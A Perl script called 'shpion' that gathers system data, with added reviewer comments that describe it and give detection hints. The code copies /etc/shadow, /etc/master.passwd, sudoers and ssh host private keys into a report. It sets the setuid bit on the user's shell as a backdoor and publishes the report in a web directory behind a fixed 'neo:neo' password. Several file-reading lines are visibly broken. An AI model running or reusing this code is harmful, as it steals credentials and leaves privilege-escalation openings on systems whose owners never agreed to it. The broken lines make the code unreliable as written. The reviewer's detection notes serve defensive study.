#!/usr/bin/perl
#shpion.0.14
#
# Reviewer summary (everything below is stated from the code as written):
#  - The script enumerates host identity, users, processes, filesystems, /proc,
#    installed packages and a long per-OS list of "main" files (which on Linux
#    includes /etc/shadow and on OpenBSD includes /etc/master.passwd and the
#    ssh host private keys) and writes all of it to a report file named
#    "info" in the current directory ($report).
#  - my_suid runs `chmod +s` on $ENV{SHELL}: a setuid user shell is the
#    most visible host artifact this script leaves behind.
#  - my_arc rotates the report into "info.N" compressed with bzip2 or gzip;
#    my_local_mail/my_remote_mail notify root / sendmail; my_public_in_www
#    copies the report into $www_path/shpion behind a static Basic-auth
#    .htpasswd containing "neo:neo".
#  Detection hints for defenders, all taken from literals in this file: files
#  named info* in the run directory, a setuid $SHELL, a public_html/shpion
#  directory with .htaccess/.htpasswd, and local mail with subject
#  "shpions_report".
#
##############################Some_chars_combination####################
# Two-letter section markers written to the report as "$$XX":
# AR Architecture of machine (e.g. i86)
# BT Time at which the script started
# CD Current directory
# CP CPU name
# DI Written by my_kill before deleting the report files
# DM dmesg output
# DO Domain
# DS Directory structure
# ER Error that must not be reported to stdout (my_or_die)
# ET Time at which the script finished
# EX Written by my_exit (currently not called)
# FL Failed
# FS Output of 'mount','df'
# HN Hostname
# HD Hard drive
# IC Interrupt counter
# IP IP_address
# IPCS Output of 'ipcs'
# IS Interrupt signal
# KN Kernel version
# LM ulimit,quota...
# MF Get 'main' files
# NF Not found
# OS Operating System
# PC ID of this process
# PD Permission denied
# PK List of installed packages
# PR /proc/ directory
# PS Output of 'ps'
# RE Report file
# SB Suid_bit
# SP 'Shpion' - this program
# SV Versions of installed software
# UE User environment
# UN Username
# WH Output of w,who,finger...
# WW Path/to/WWW
########################################################################
# Top level: no 'use strict'/'use warnings'; every variable set in
# my_define_glob_var is a package global read by the subs below.
&my_define_glob_var;
&my_signal_def;
# Two-arg open of the report; STDERR is re-opened on the same path as a
# second independent handle, so stderr output lands in the report file too.
open REPORT,">$report" or &my_kill;
open STDERR,">$report" or &my_kill;
&my_time('begin'); #Begin time of script execution
&my_ipcs;
$n=&my_arc($n);
&my_print_hostname; #Print Username,Hostname,Current_directory and other
$n=&my_arc($n); #Compress 'report_file' when FILESIZE>LIMIT/2 (see my_arc)
&my_suid; #Put SUID_BIT on $SHELL
&my_print_env; #Print user environment
$n=&my_arc($n);
&my_print_who; #Get info about logged-in users
$n=&my_arc($n);
&my_print_dmesg; #System boot info
$n=&my_arc($n);
&my_hdparm;
$n=&my_arc($n);
&my_print_fs; #Get info about filesystems
$n=&my_arc($n);
&my_print_limit; #Print user's limits
&my_print_ps; #Processes running now
$n=&my_arc($n);
&my_print_ds; #Print directory structure
#&my_print_ds_alt; very slow #Will be in future
&my_print_proc; #Print some files from /proc
$n=&my_arc($n);
&my_print_version; #Versions of some software
&my_print_packages; #List of installed packages
$n=&my_arc($n);
&my_print_main_files; #Get 'main' files where possible
&my_print_ic; #Interrupt counter
$n=&my_arc($n);
&my_time('end'); #End time of script execution
#&my_exit; #NOT_WORK
$n=&my_arc($n,'now'); #Final rotation: 'now' forces compression and leaves REPORT closed
&my_local_mail;
&my_remote_mail;
&my_public_in_www; #Publish info.[bz2|gz] on the web if the user has a www account
close(REPORT);
#***********************************************************************
# my_arc($counter[, 'now'])
#   Rotates the report file. Runs sync, then reads the file-size limit via
#   `bash -c "ulimit -f"` (blocks, multiplied by $blocksize; "unlimited"
#   becomes 999999999; no value at all falls back to 300000). When the report
#   is larger than half that limit, or the second argument is 'now', the
#   handle is closed, the file renamed to "$report.N" and compressed with
#   bzip2 (falling back to gzip; with neither, my_kill deletes everything).
#   REPORT is reopened unless 'now' was given. Returns the new counter N,
#   which the caller stores back into $n.
sub my_arc{
    my $result=$_[0];
    my $blocksize=1024;
    my $ln_rep=(stat($report))[7];
    my $sync=`which sync 2>/dev/null`;
    my $bash=`which bash 2>/dev/null`;
    my $bzip2=`which bzip2 2>/dev/null`;
    my $gzip=`which gzip 2>/dev/null`;
    my $ln_lim;
    chomp($sync);
    chomp($bash);
    chomp($bzip2);
    chomp($gzip);
    if(-e($sync)){
        if(-x($sync)){ system("$sync 1>/dev/null 2>/dev/null") }
        else{print REPORT "PD $sync\n"}
    }
    else{print REPORT "NF sync\n"}
    if(-e($bash)){
        if(-x($bash)){ $ln_lim=`$bash -c "ulimit -f 2>/dev/null"` }
        else{print REPORT "PD $bash\n"}
    }
    else{print REPORT "NF bash\n"}
    if($ln_lim=~/unlimited/i){$ln_lim=999999999}
    if($ln_lim){$ln_lim*=$blocksize}else{$ln_lim=300000}
    if($ln_rep>($ln_lim/2)or($_[1] eq 'now')){
        $result++;
        close(REPORT)or &my_kill;
        rename("$report","$report.$result");
        # Compressed archive name is "$report.$result.bz2" or ".gz" as produced
        # by the external tool; the path itself is interpolated into a shell command.
        if(-e($bzip2)){
            if(-x($bzip2)){ system("bzip2 -z $report.$result 2>&1") }
            else{print REPORT "PD $bzip2\n"}
        }
        elsif(-e($gzip)){
            if(-x($gzip)){ system("gzip $report.$result 1>/dev/null 2>/dev/null") }
            else{print REPORT "PD $gzip\n"}
        }
        else{
            print REPORT "NF bzip2\nNF gzip\n";
            &my_kill
        }
        unless($_[1] eq 'now'){open REPORT,">$report" or &my_kill}
    }
    return $result
}
#_______________________________________________________________________
# my_define_glob_var()
#   Fills the package globals used everywhere else, mostly from shell
#   commands (whoami, hostname, uname, pwd). $report is "<cwd>/info";
#   $www_path is a hard-coded user public_html directory.
sub my_define_glob_var{
    chomp($username=`whoami 2>/dev/null`);
    chomp($hostname=`hostname -s 2>/dev/null`);
    chomp($domain=`hostname -d 2>/dev/null`);
    chomp($ip=`hostname -i 2>/dev/null`);
    chomp($arc=`uname -m 2>/dev/null`);
    chomp($kernel=`uname -r 2>/dev/null`);
    chomp($os=`uname -s 2>/dev/null`);
    chomp($os_ver=`uname -v 2>/dev/null`);
    chomp($proc=`uname -p 2>/dev/null`);
    chomp($process_id=$$);
    chomp($shpion=$0); #this script name
    chomp($www_path='/home/liam/public_html'); #path to user_www_directory, comment out if you don't want a public report
    chomp($cur_dir=`pwd 2>/dev/null`); #Current_directory
    chomp($report=$cur_dir.'/info'); #REPORT_FILE
    $send_mail=1; #mail report : 1=true,other=false
    $n=0; #number of REPORT_FILE.[b|g]zip
    $ic=0; #interrupt counter
}
#_______________________________________________________________________
# my_exit()
#   Writes the EX marker and deletes the uncompressed report. Its call at
#   top level is commented out ("NOT_WORK").
sub my_exit{
    print REPORT "\$\$EX\nRM $report ";
    if(unlink($report)){print REPORT "OK\n"}
    else{print REPORT "FL\n"}
}
#_______________________________________________________________________
# my_ipcs()
#   Runs `ipcs` with each of -u -t -p -c -l and appends the output under
#   the IPCS marker (PD/NF written when ipcs is not executable/found).
sub my_ipcs{
    my $output;
    my $ipcs=`which ipcs 2>/dev/null`;
    chomp($ipcs);
    print REPORT "\$\$IPCS\n";
    if(-e($ipcs)){
        if(-x($ipcs)){
            foreach my $arg(qw ! -u -t -p -c -l !){
                chomp($output=`$ipcs $arg 2>/dev/null`);
                print REPORT "$ipcs $arg $output"
            }
        }
        else{print REPORT "PD $ipcs\n"}
    }
    else{print REPORT "NF ipcs\n"}
}
#_______________________________________________________________________
# my_hdparm()
#   Linux only. Scans /etc/fstab for the first /dev/hdX or /dev/sdX
#   (default /dev/hda) and appends `hdparm -abcCdgiIkmnru` output for that
#   device and for /dev/cdrom under the HD marker.
sub my_hdparm{
    if($os=~/linux/i){
        my ($dev,$str);
        my $hdparm=`which hdparm 2>/dev/null`;
        chomp($hdparm);
        if(-e($hdparm)){
            if(-x($hdparm)){
                open FSTAB,"/etc/fstab" or &my_or_die;
                # NOTE(review): the readline operand after "$str=" appears to
                # have been stripped (angle brackets lost in extraction); kept
                # as found on the page.
                while(defined($str=)){
                    if($str=~/(\/dev\/hd[a-z])/i){$dev=$1;break}
                    elsif($str=~/(\/dev\/sd[a-z])/i){$dev=$1;break}
                    else{$dev="/dev/hda";break}
                }
                close(FSTAB);
                print REPORT "\$\$HD\n$dev\n",`$hdparm -abcCdgiIkmnru $dev 2>&1`;
                print REPORT "/dev/cdrom\n",`$hdparm -abcCdgiIkmnru /dev/cdrom 2>&1`;
            }
            else{print REPORT "PD $hdparm\n"}
        }
        else{print REPORT "NF hdparm\n"}
    }
}
#_______________________________________________________________________
# my_kill()
#   Failure path: records the DI marker and $!, then unlinks every file
#   matching "$report*" (the report and its rotated/compressed copies).
#   Note it is also the 'or' branch of the initial open of REPORT, in which
#   case the print goes to a handle that never opened.
sub my_kill{
    my $f;
    print REPORT "\$\$DI\nLAST_ERR_MSG:$!\n";
    foreach $f(glob "$report*"){
        print REPORT "RM $f";
        if(unlink($f)){print REPORT "OK\n"}
        else{print REPORT "FL\n"}
    }
}
#_______________________________________________________________________
# my_local_mail()
#   When $send_mail is 1, pipes a short notice (host, domain, IP) to
#   `mail -s shpions_report root`. The open is unchecked.
sub my_local_mail{
    if($send_mail eq 1){
        chomp(my $mail=`which mail 2>/dev/null`);
        my $user="root";
        if(-e($mail)){
            if(-x($mail)){
                open MAIL,"|$mail -s shpions_report $user";
                print MAIL "Hello $user!\nMy name is Shpion\nI have some info about $hostname.$domain [$ip]\nYou must read this ...\n";
                close MAIL
            }
            else{print REPORT "PD $mail\n"}
        }
        else{print REPORT "NF mail\n"}
    }
}
#_______________________________________________________________________
# my_or_die()
#   Non-fatal error hook: appends the ER marker and $! to the report.
sub my_or_die{ print REPORT "\$\$ER\n$!\n" }
#_______________________________________________________________________
# my_print_dmesg()
#   Appends `dmesg` output under the DM marker.
sub my_print_dmesg{
    my $dmesg=`which dmesg 2>/dev/null`;
    chomp($dmesg);
    print REPORT "\$\$DM\n";
    if(-e($dmesg)){
        if(-x($dmesg)){ print REPORT `$dmesg 2>&1` }
        else{print REPORT "PD $dmesg\n"}
    }
    else{print REPORT "NF dmesg\n"}
}
#_______________________________________________________________________
# my_print_ds()
#   Appends `ls -lag` of a per-OS list of system directories under the DS
#   marker, calling my_arc after each directory so the report can rotate.
sub my_print_ds{
    my($dir,@dirs);
    if($os=~/linux/i){
        @dirs=qw[ / /bin /sbin /etc /dev /usr/bin /usr/X11R6/bin /lib /lib/security /usr/lib /usr/X11R6/lib /var/lib /var/log /var/spool/mail /var/run /var/www/cgi-bin /boot /tmp /home /etc/rc.d /etc/rc.d/init.d /etc/rc.d/rc3.d /etc/rc.d/rc5.d ]
    }
    elsif($os=~/openbsd/i){
        @dirs=qw[ / bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc /dev /usr /tmp /home /mnt /var /var/log /var/www/cgi-bin /usr/lib /usr/libexec /usr/local/lib /usr/local/libexec ]
    }
    else{
        @dirs=qw[ / /bin /sbin /etc /dev /usr/bin /usr/X11R6/bin /lib /usr/lib /var/log /boot /tmp /home /etc/rc.d /etc/rc.d/init.d /etc/rc.d/rc3.d /etc/rc.d/rc5.d ]
    }
    print REPORT "\$\$DS\n";
    foreach $dir(@dirs){
        if(-e $dir){
            if(-r $dir){ print REPORT "DS $dir\n",`ls -lag $dir` }
            else{ print REPORT "PD $dir\n" }
        }
        else{ print REPORT "NF $dir\n" }
        $n=&my_arc($n);
    }
}
#_______________________________________________________________________
# my_print_ds_alt()
#   Alternative DS listing using lstat() fields per entry, one line per
#   file. Not called from the top level (commented out as too slow).
sub my_print_ds_alt{
    my($dir,$f);
    print REPORT "\$\$DS\n";
    foreach $dir(qw[ / /bin /sbin /etc /usr/bin /usr/X11R6/bin /lib /usr/lib /var/log /boot /tmp /home /etc/rc.d /etc/rc.d/init.d /etc/rc.d/rc3.d /etc/rc.d/rc5.d ]){
        print REPORT "DS $dir\n";
        print REPORT "Filename # mode # uid # gid # size[blocks] # dev # inode # num_link # rdev # atime # mtime # ctime";
        foreach $f(glob "$dir/.* $dir/*"){
            # lstat() is called once per field; the index order is
            # mode, uid, gid, size, blocks, dev, inode, nlink, rdev, atime, mtime, ctime.
            print REPORT "$f#",(lstat $f)[2],"#",(lstat $f)[4],"#",(lstat $f)[5],"#",(lstat $f)[7],"[",(lstat $f)[12],"]#",(lstat $f)[0],"#",(lstat $f)[1],"#",(lstat $f)[3],"#",(lstat $f)[6],"#",(lstat $f)[8],"#",(lstat $f)[9],"#",(lstat $f)[10],"\n";
        }
        $n=&my_arc($n)
    }
}
#_______________________________________________________________________
# my_print_env()
#   Appends selected %ENV values (PATH, SHELL, HOME, MAIL*, HIST*) under
#   the UE marker. The key spelled 'CDPATCH' is reproduced as written.
sub my_print_env{
    print REPORT "\$\$UE\nPATH=$ENV{'PATH'}\nCDPATCH=$ENV{'CDPATCH'}\nSHELL=$ENV{'SHELL'}\nENV=$ENV{'ENV'}\nHOME=$ENV{'HOME'}\nMAIL=$ENV{'MAIL'}\nMAILCHECK=$ENV{'MAILCHECK'}\nMAILPATH=$ENV{'MAILPATH'}\nHISTSIZE=$ENV{'HISTSIZE'}\nHISTFILESIZE=$ENV{'HISTFILESIZE'}\n"
}
#_______________________________________________________________________
# my_print_fs()
#   Appends `df` and `mount` output under the FS marker.
sub my_print_fs{
    chomp(my $df=`which df 2>/dev/null`);
    chomp(my $mount=`which mount 2>/dev/null`);
    print REPORT "\$\$FS\n";
    if(-e($df)){
        if(-x($df)){ print REPORT "df\n",`$df 2>&1` }
        else{print REPORT "PD $df\n"}
    }
    else{print REPORT "NF df\n"}
    if(-e($mount)){
        if(-x($mount)){ print REPORT "mount\n",`$mount 2>&1` }
        else{print REPORT "PD $mount\n"}
    }
    else{print REPORT "NF mount\n"}
}
#_______________________________________________________________________
# my_print_hostname()
#   Dumps the identity globals set by my_define_glob_var, each under its
#   own marker (CD, UN, HN, DO, IP, AR, OS, KN, CP, PC, SP, WW, RE).
sub my_print_hostname{
    print REPORT "\$\$CD\n$cur_dir\n\$\$UN\n$username\n\$\$HN\n$hostname\n\$\$DO\n$domain\n\$\$IP\n$ip\n\$\$AR\n$arc\n\$\$OS\n$os\n$os_ver\n";
    print REPORT "\$\$KN\n$kernel\n\$\$CP\n$proc\n\$\$PC\n$process_id\n\$\$SP\n$shpion\n\$\$WW\n$www_path\n\$\$RE\n$report\n"
}
#_______________________________________________________________________
# my_print_ic()
#   Appends the signal counter $ic (incremented by my_sigget) under IC.
sub my_print_ic{ print REPORT "\$\$IC\n$ic\n" }
#_______________________________________________________________________
# my_print_limit()
#   Appends `bash -c "ulimit -a"` output under the LM marker.
sub my_print_limit{
    my $bash=`which bash 2>/dev/null`;
    chomp($bash);
    print REPORT "\$\$LM\n";
    if(-e($bash)){
        if(-x($bash)){ print REPORT `($bash -c "ulimit -a" ) 2>&1` }
        else{print REPORT "PD $bash\n"}
    }
    else{print REPORT "NF bash\n"}
}
#_______________________________________________________________________
# my_print_main_files()
#   Copies the contents of a per-OS list of configuration, credential and
#   log files into the report under the MF marker, skipping lines that
#   start with '#'. The Linux list includes /etc/shadow and /etc/sudoers;
#   the OpenBSD list includes /etc/master.passwd and the ssh host private
#   keys. A file that is not readable is recorded as "PD <path>", a missing
#   one as "NF <path>". my_arc is called before each file so the report can
#   rotate.
sub my_print_main_files{
    my ($f,$str);
    my @main_files=qw[ /etc/passwd /etc/group];
    print REPORT "\$\$MF\n";
    if($os=~/linux/i){
        @main_files=qw[ /etc/passwd /etc/shadow /var/log/messages /var/log/boot.log /var/ftp/etc/passwd /var/ftp/etc/group /etc/aliases /etc/anacrontab /etc/crontab /etc/diskcheck.conf /etc/ftpacces /etc/ftphosts /etc/ftpusers /etc/group /etc/host.conf /etc/hosts.allow /etc/hosts.deny /etc/issue /etc/issue.net /etc/ld.so.conf /etc/lilo.conf /etc/login.defs /etc/logrotate.conf /etc/mail.rc /etc/motd /etc/fstab /etc/named.conf /etc/pwdb.conf /etc/profile /etc/securetty /etc/sendmail.cf /etc/services /etc/shells /etc/sudoers /etc/sysctl.conf /etc/syslog.conf /etc/inetd.conf /etc/xinetd.conf /etc/cron.d/sysstat /etc/httpd/conf/httpd.conf /etc/httpd/conf/access.conf /etc/httpd/conf/srm.conf /etc/mail.access /etc/mail/domaintable /etc/mail/local-host-names /etc/mail/trusted-users /etc/ppp/chap-secrets /etc/ppp/pap-secrets /etc/security/access.conf /etc/sysconfig/networking/ifcfg-lo /etc/ssh/sshd_config /etc/ssh/ssh_config /etc/tripwire/twcfg.txt /etc/tripwire/twpol.txt /etc/rc.d/rc /etc/rc.d/rc.local /etc/rc.d/rc.sysinit ]
    }
    if($os=~/openbsd/i){
        @main_files=qw[ /etc/passwd /etc/master.passwd /.cshrc /.profile /etc/adduser.conf /etc/adduser.message /etc/csh.cshrc /etc/csh.login /etc/csh.logout /etc/daily /etc/exports /etc/fbtab /etc/fstab /etc/ftpchroot /etc/ftpusers /etc/group /etc/hosts /etc/hosts.equiv /etc/inetd.conf /etc/ksh.kshrc /etc/kerberosIV/krb.conf /etc/kerberosV/krb.conf /etc/login.conf /etc/mail.rc /etc/mailer.conf /etc/monthly /etc/motd /etc/mrouted.conf /etc/myname /etc/mail/aliases /etc/mail/localhost.cf /etc/mail/sendmail.cf /etc/mail/submit.cf /etc/nat.conf /etc/netstart /etc/networks /etc/newsyslog.conf /etc/phones /etc/printcap /etc/protocols /etc/ppp/pap-secrets /etc/ppp/chap-secrets /etc/ppp/ppp.secret /etc/rc /etc/rc.conf /etc/rc.local /etc/rc.securelevel /etc/rc.shutdown /etc/remote /etc/rpc /etc/security /etc/services /etc/shells /etc/skeykeys /etc/sudoers /etc/sysctl.conf /etc/syslog.conf /etc/skel/.cshrc /etc/skel/.login /etc/skel/.mailrc /etc/skel/.profile /etc/skel/.rhosts /etc/sliphome/slip.hosts /etc/sliphome/slip.login /etc/ssh/ssh_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_rsa_key.pub /etc/ssh/sshd_config /etc/ssl/openssl.cnf /etc/ttys /etc/weekly /var/cron/tabs/root /var/cron/log /var/www/conf/httpd.conf /var/www/conf/access.conf /var/www/conf/srm.conf /var/log/adduser /var/log/authlog /var/log/daemon /var/log/ftpd /var/log/maillog /var/log/messages /var/log/secure /var/log/xferlog ]
    }
    if($os=~/freebsd/i){
        @main_files=qw[ /etc/passwd /etc/master.passwd ]
    }
    foreach $f(@main_files){
        $n=&my_arc($n);
        if(-e($f)){
            if(-r($f)){
                open FILE,$f or next;
                print REPORT "MF $f\n";
                # NOTE(review): the readline operand after "$str=" appears to
                # have been stripped (angle brackets lost in extraction); kept
                # as found on the page. The two substitutions below act on $_,
                # not on $str.
                while(defined($str=)){
                    s#^\s+##;
                    s#\s+$##;
                    if($str=~/^#/){next};
                    if($str=~/^\n+/){next};
                    print REPORT $str;
                }
            }
            else {print REPORT "PD $f\n"}
        }
        else {print REPORT "NF $f\n"}
    }
}
#_______________________________________________________________________
# my_print_packages()
#   Appends the installed-package list under PK: `rpm -qa | sort` on Linux,
#   `pkg_info | sort` on OpenBSD (the OpenBSD branch writes no PK marker).
sub my_print_packages{
    if($os=~/linux/i){
        my $rpm=`which rpm 2>/dev/null`;
        chomp($rpm);
        print REPORT "\$\$PK\n";
        if(-e($rpm)){
            if(-x($rpm)){ print REPORT `(($rpm -qa)|sort) 2>&1` }
            else{print REPORT "PD $rpm\n"}
        }
        else{print REPORT "NF rpm\n"}
    }
    if($os=~/openbsd/i){
        my $pkginfo=`which pkg_info 2>/dev/null`;
        chomp($pkginfo);
        if(-e($pkginfo)){
            if(-x($pkginfo)){ print REPORT `($pkginfo|sort) 2>&1` }
            else{print REPORT "PD $pkginfo\n"}
        }
        else{print REPORT "NF pkg_info\n"}
    }
}
#_______________________________________________________________________
# my_print_proc()
#   Linux only. Copies the listed /proc entries (cpuinfo, devices, ...,
#   version) into the report under the PR marker.
sub my_print_proc{
    if($os=~/linux/i){
        my ($f,$str);
        print REPORT "\$\$PR\n";
        if(-e('/proc')){
            if(-r('/proc')){
                foreach $f(qw [ cpuinfo devices dma filesystems interrupts iomem ioports meminfo modules partitions pci slabinfo stat swaps version ]){
                    print REPORT "PR /proc/$f\n";
                    if(-e("/proc/$f")){
                        if(-r("/proc/$f")){
                            # NOTE(review): the open target and the readline
                            # loop head appear to have been lost between the
                            # opening quote and ")){" (angle-bracket text
                            # stripped in extraction); kept as found on the page.
                            open FILE,")){
                                print REPORT "$str";
                            }
                            close(FILE)
                        }
                        else{ print REPORT "PD /proc/$f" }
                    }
                    else{ print REPORT "NF /proc/$f" }
                }
            }
            else {print REPORT "PD /proc\n"}
        }
        else{print REPORT "NF /proc\n"}
    }
}
#_______________________________________________________________________
# my_print_ps()
#   Appends a process listing under PS: `ps -elf` on Linux, `ps -aux` on
#   OpenBSD, plain `ps` otherwise (the last branch is spelled 'rpint' as
#   written).
sub my_print_ps{
    my $ps=`which ps 2>/dev/null`;
    chomp($ps);
    print REPORT "\$\$PS\n";
    if(-e($ps)){
        if(-x($ps)){
            if($os=~/linux/i){ print REPORT `$ps -elf 2>&1` }
            elsif($os=~/openbsd/i){ print REPORT `$ps -aux 2>&1` }
            else{ rpint REPORT `$ps 2>&1` }
        }
        else{print REPORT "PD $ps\n"}
    }
    else{print REPORT "NF ps\n"}
}
#_______________________________________________________________________
# my_print_version()
#   For each of gcc perl sh bash bash2 httpd rpm, runs `<tool> --version`
#   and records the first numeric run of its output under the SV marker.
#   $softv is not reset between tools, so a tool without output can show
#   the previous tool's value.
sub my_print_version{
    my ($prog,$soft,$softv);
    print REPORT "\$\$SV\n";
    foreach $prog(qw ! gcc perl sh bash bash2 httpd rpm !){
        chomp($soft=`which $prog 2>/dev/null`);
        if(-e($soft)){
            if(-x($soft)){ $softv=`$soft --version 2>/dev/null` }
            else{print REPORT "PD $soft\n"}
        }
        else{print REPORT "NF $prog\n"}
        if($softv=~/[0-9][0-9.]*/){$softv=$&};
        print REPORT "$soft:$softv\n";
    }
}
#_______________________________________________________________________
# my_print_who()
#   Appends the output of w, who, finger, lastlog and last under WH.
sub my_print_who{
    my($prog,$f);
    print REPORT "\$\$WH\n";
    foreach $f(qw !w who finger lastlog last !){
        chomp($prog=`which $f 2>/dev/null`);
        if(-e($prog)){
            if(-x($prog)){ print REPORT "$prog\n",`$prog 2>&1` }
            else{print REPORT "PD $prog\n"}
        }
        else{print REPORT "NF $f\n"}
    }
}
#_______________________________________________________________________
# my_public_in_www()
#   When $www_path is defined, creates "$www_path/shpion", copies every
#   "$report*" file into it with cp, then writes a .htpasswd containing the
#   literal "neo:neo" (chmod 0640) and a .htaccess requiring Basic auth
#   against it. These two files are a distinctive on-disk artifact.
sub my_public_in_www{
    if(defined($www_path)){
        my $f;
        my $www_shp=$www_path.'/shpion';
        my $www_acs=$www_shp.'/.htaccess';
        my $www_psw=$www_shp.'/.htpasswd';
        my $cp=`which cp 2>/dev/null`;
        unless(-e($www_shp)){mkdir($www_shp,0077) or &my_or_die}
        if(-e($cp)){
            if(-x($cp)){
                foreach $f(glob "$report*"){ system("$cp $f $www_shp 1>/dev/null 2>/dev/null") }
            }
            else{print REPORT "PD $cp\n";return}
        }
        else{print REPORT "NF cp\n";return}
        open HTPASSWD,">$www_psw" or &my_or_die;
        print HTPASSWD "neo:neo\n";
        close(HTPASSWD);
        chmod(0640,$www_psw);
        open HTACCESS,">$www_acs" or &my_or_die;
        print HTACCESS "AuthType Basic\nAuthName \"Shpion directory\"\nAuthUserFile $www_shp/.htpasswd\nRequire valid-user\n";
        close(HTACCESS)
    }
}
#_______________________________________________________________________
# my_remote_mail()
#   When $send_mail is 1, pipes a fixed message (From/To/Subject headers,
#   body "No Work now") to `sendmail -oi -t`.
sub my_remote_mail{
    if($send_mail eq 1){
        chomp(my $mail=`which sendmail 2>/dev/null`);
        if(-e($mail)){
            if(-x($mail)){
                unless(open(SENDMAIL,"|$mail -oi -t")){&my_or_die;return}
                # NOTE(review): heredoc line breaks were flattened in
                # extraction; one header per line is a reconstruction.
                print SENDMAIL <<"EOF";
From: Big Daddy
To: Boss
Subject: Shpions report

No Work now
EOF
                close(SENDMAIL);
            }
            else{print REPORT "PD $mail\n"}
        }
        else{print REPORT "NF mail\n"}
    }
}
#_______________________________________________________________________
# my_signal_def()
#   Installs my_sigget as the handler for INT STOP HUP ABRT FPE ILL SEGV
#   TERM, so these signals are logged to the report instead of stopping
#   the run (handler name given as a bareword).
sub my_signal_def{
    my $sig;
    foreach $sig(qw !INT STOP HUP ABRT FPE ILL SEGV TERM !){
        #add CHLD if you want TONNES of 'CHLD' entries in REPORT_FILE
        $SIG{$sig}=my_sigget
    }
}
#_______________________________________________________________________
# my_sigget($signal)
#   Signal handler: increments the global $ic and appends the IS marker,
#   the signal name and a timestamp.
sub my_sigget{
    my $signal=shift;
    my $time=localtime;
    $ic++;
    print REPORT "\$\$IS\n$signal\n",(localtime $time),"\n"
}
#_______________________________________________________________________
# my_suid()
#   Runs `chmod +s` on the binary named in $ENV{SHELL} and records under
#   the SB marker whether the command succeeded ("has"/"not has"). This is
#   the one step that modifies system state rather than collecting it.
sub my_suid{
    my $have='not has';
    my $shell=$ENV{'SHELL'};
    chomp($shell);
    print REPORT "\$\$SB\n";
    unless(system("chmod +s $shell 1>/dev/null 2>/dev/null")){$have='has'};
    print REPORT "$shell $have SUID bit\n"
}
#_______________________________________________________________________
# my_time('begin'|'end')
#   Appends the BT or ET marker with the current localtime, then the raw
#   localtime string on its own line.
sub my_time{
    my $lt=localtime;
    if($_[0]=~/begin/i){print REPORT "\$\$BT\n",(localtime $lt),"\n"}
    if($_[0]=~/end/i){print REPORT "\$\$ET\n",(localtime $lt),"\n"}
    print REPORT "$lt\n"
}